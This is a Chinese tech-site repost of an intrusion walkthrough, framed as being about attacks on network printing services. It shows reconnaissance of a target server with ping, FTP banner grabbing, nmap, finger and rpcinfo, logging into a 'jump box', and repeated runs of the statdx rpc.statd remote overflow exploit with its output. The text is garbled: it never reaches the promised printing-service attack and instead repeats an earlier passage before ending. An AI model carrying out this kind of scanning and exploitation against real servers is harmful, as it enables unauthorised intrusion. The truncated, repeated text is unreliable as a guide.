1. 树叶云首页
  2. 技术资讯

关于网络打印服务攻击的介绍

运维技术资讯

此文的目的不在于教人入侵Linux服务器,而是为了提高自身的技术和加强网络管理员的安全防范意识。仅此而已!粗心大意的网络管理员应该明白:由于你们一个小小的操作失误可能会导致整个网络全面沦陷!本文主要是围绕LPD:网络打印服务的攻击而进行的。

首先确定目标,假设是:www.XXX.com

先让俺看看是不是连得上:

以下是引用片段:

C:\ping www.XXX.com   
Pinging www.XXX.com[202.106.184.200] with 32 bytes of data:   
Reply from 202.106.184.200: bytes=32 time=541ms TTL=244   
Reply from 202.106.184.200: bytes=32 time=620ms TTL=244   
Reply from 202.106.184.200: bytes=32 time=651ms TTL=244   
Reply from 202.106.184.200: bytes=32 time=511ms TTL=244   
Ping statistics for 202.106.184.200:   
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),   
Approximate round trip times in milli-seconds:   
Minimum = 511ms, Maximum = 651ms, Average = 580ms   
嘻嘻—不但连得上,速度还不错……   
先telnet看看banner:
C:\>telnet www.XXX.com

遗失对主机的连接。

再试试ftp,

以下是引用片段:

C:\>ftp www.XXX.com   
Connected to www.fbi.gov.tw.   
220 XXX-www FTP server (Version wu-2.6.1(1) Wed Aug 9 05:54:50 EDT 2000) ready.   
User (www.XXX.com:(none)):

wu-2.6.1看来有点眉目了。这台机器像是RedHat7.0!首先必须确认一下,连上俺的跳板:

以下是引用片段: 

C:\>telnet xxx.xxx.xxx.xxx   
Red Hat Linux release 7.0 (Guinness)   
Kernel 2.2.16-22smp on an i686   
login: fetdog   
Password:   
bash-2.04$

拿nmap扫描器(下载地址:http://www.heibai.net/download/Soft/Soft_2812.htm),看看其中的奥妙~~~

以下是引用片段: 

bash-2.04$nmap -sT -O www.XXX.com   
Starting nmap V. 2.54BETA7 ( www.insecure.org/nmap/ )   
WARNING! The following files exist and are readable: /usr/local/sha   
-services and ./nmap-services. I am choosing /usr/local/share/nmap/   
s for security reasons. set NMAPDIR=. to give priority to files in   
irectory   
Interesting ports on (www.XXX.com):   
(The 1520 ports scanned but not shown below are in state: closed)   
Port State Service   
25/tcp open smtp   
79/tcp open finger   
80/tcp open http   
111/tcp open sunrpc   
113/tcp open auth   
443/tcp open https   
513/tcp open login   
514/tcp open shell   
515/tcp open printer   
587/tcp open submission   
1024/tcp open kdm   
TCP Sequence Prediction: Class=random positive increments   
Difficulty=3247917 (Good luck!)   
Remote operating system guess: Linux 2.1.122 - 2.2.16   
Nmap run completed -- 1 IP address (1 host up) scanned in 9 seconds

打开的端口还挺多,这意味着入侵的可能性增加。79/tcp open finger ,先看看这个,不过linux没有finger用户列表这个漏洞。

以下是引用片段:

bash-2.04$finger @www.XXX.com
[www.XXX.com]
No one logged on.

再看看111/tcp open sunrpc 。近来rpc漏洞风行,不知道RH7这个东东会不会有?先看看再说!

以下是引用片段:

bash-2.04$rpcinfo -p www.XXX.com
program vers proto port service
100000 2 tcp 111 rpcbind
100000 2 udp 111 rpcbind
100021 1 udp 1024 nlockmgr
100021 3 udp 1024 nlockmgr
100024 1 udp 1025 status
100024 1 tcp 1024 status

看来有rpc.statd服务。来看看能不能远程溢出拿个rootshell。

以下是引用片段:

bash-2.04$./statdx -h
statdx by ron1n
Usage: stat [-t] [-p port] [-a addr] [-l len]
[-o offset] [-w num] [-s secs] [-d type]
-t attack a tcp dispatcher [udp]
-p rpc.statd serves requests on [query]
-a the stack address of the buffer is
-l the length of the buffer is [1024]
-o the offset to return to is [600]
-w the number of dwords to wipe is [9]
-s set timeout in seconds to [5]
-d use a hardcoded
Available types:
0 RedHat 6.2 (nfs-utils-0.1.6-2)
1 RedHat 6.1 (knfsd-1.4.7-7)
2 RedHat 6.0 (knfsd-1.2.2-4)

看来并不支持RH7。还是继续尝试,把0-2全部试试看再说!start……

bash-2.04$stat -d 0 www.XXX.com
buffer: 0xbffff314 length: 999 (+str/+nul)
target: 0xbffff718 new: 0xbffff56c (offset: 600)
wiping 9 dwords
Failed - statd returned res_stat: (failure) state: 21

受挫,再试……

bash-2.04$stat -d 1 www.XXX.com
buffer: 0xbffff314 length: 999 (+str/+nul)
target: 0xbffff718 new: 0xbffff56c (offset: 600)
wiping 9 dwords
Failed - statd returned res_stat: (failure) state: 21

一样“继续

以下是引用片段:

bash-2.04$finger @www.XXX.com
[www.XXX.com]
No one logged on.

再看看111/tcp open sunrpc 。近来rpc漏洞风行,不知道RH7这个东东会不会有?先看看再说!

【编辑推荐】

  1. Sun One/iPlanet Web服务器远程拒绝服务攻击漏洞
  2. 关注DNS服务器安全黑客攻击早预防

文章来源网络,作者:运维,如若转载,请注明出处:https://shuyeidc.com/wp/140037.html<

(0)
运维的头像运维
00
上一篇2025-03-03 18:24
下一篇 2025-03-03 18:25

相关推荐

  • 如何制作个人主题技术资讯

    个人主题怎么制作?

    制作个人主题是一个将个人风格、兴趣或专业领域转化为视觉化或结构化内容的过程,无论是用于个人博客、作品集、社交媒体账号还是品牌形象,核心都是围绕“个人特色”展开,以下从定位、内容规划、视觉设计、技术实现四个维度,详细拆解制作个人主题的完整流程,明确主题定位:找到个人特色的核心主题定位是所有工作的起点,需要先回答……

    运维的头像运维
    2025-11-20
    0
  • 如何管理社群营销技术资讯

    社群营销管理关键是什么?

    社群营销的核心在于通过建立有温度、有价值、有归属感的社群,实现用户留存、转化和品牌传播,其管理需贯穿“目标定位-内容运营-用户互动-数据驱动-风险控制”全流程,以下从五个维度展开详细说明:明确社群定位与目标社群管理的首要任务是精准定位,需明确社群的核心价值(如行业交流、产品使用指导、兴趣分享等)、目标用户画像……

    运维的头像运维
    2025-11-20
    0
  • 香港公司如何网站备案技术资讯

    香港公司网站备案需要什么材料?

    香港公司进行网站备案是一个涉及多部门协调、流程相对严谨的过程,尤其需兼顾中国内地与香港两地的监管要求,由于香港公司注册地与中国内地不同,其网站若主要服务内地用户或使用内地服务器,需根据服务器位置、网站内容性质等,选择对应的备案路径(如工信部ICP备案或公安备案),以下从备案主体资格、流程步骤、材料准备、注意事项……

    运维的头像运维
    2025-11-20
    0
  • 如何企业上云推广技术资讯

    如何企业上云推广

    企业上云已成为数字化转型的核心战略,但推广过程中需结合行业特性、企业痛点与市场需求,构建系统性、多维度的推广体系,以下从市场定位、策略设计、执行落地及效果优化四个维度,详细拆解企业上云推广的实践路径,精准定位:明确目标企业与核心价值企业上云并非“一刀切”的方案,需先锁定目标客户群体,提炼差异化价值主张,客户分层……

    运维的头像运维
    2025-11-20
    0
  • PS如何设计搜索框技术资讯

    PS设计搜索框的实用技巧有哪些?

    在PS中设计一个美观且功能性的搜索框需要结合创意构思、视觉设计和用户体验考量,以下从设计思路、制作步骤、细节优化及交互预览等方面详细说明,帮助打造符合需求的搜索框,设计前的规划明确使用场景:根据网站或APP的整体风格确定搜索框的调性,例如极简风适合细线条和纯色,科技感适合渐变和发光效果,电商类则可能需要突出搜索……

    运维的头像运维
    2025-11-20
    0

发表回复

您的邮箱地址不会被公开。必填项已用 * 标注